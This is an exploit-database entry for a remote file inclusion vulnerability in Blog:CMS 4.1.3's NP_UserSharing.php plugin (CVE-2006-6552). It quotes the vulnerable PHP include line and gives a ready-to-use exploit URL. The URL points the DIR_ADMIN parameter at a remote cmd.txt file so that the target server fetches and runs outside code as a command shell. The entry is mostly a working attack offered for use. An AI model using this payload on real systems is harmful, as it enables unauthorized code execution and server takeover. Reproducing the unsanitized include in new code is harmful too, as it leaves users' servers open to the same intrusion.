Blog:CMS 4.1.3 - 'NP_UserSharing.php' Remote File Inclusion

Author: HACKERS PAL
type: webapps
platform: php
port: 
date_added: 2006-12-11 
date_updated:  
verified: 1 
codes: OSVDB-32258;CVE-2006-6552;OSVDB-32068 
tags: 
aliases:  
screenshot_url:  
application_url: 

BLOG:CMS Remote file include Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

global $DIR_ADMIN;
include ( substr($DIR_ADMIN,0,strpos($DIR_ADMIN,'admin'))."photo".DIRECTORY_SEPARATOR."includes".DIRECTORY_SEPARATOR."user.class.php");

http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin

# milw0rm.com [2006-12-12]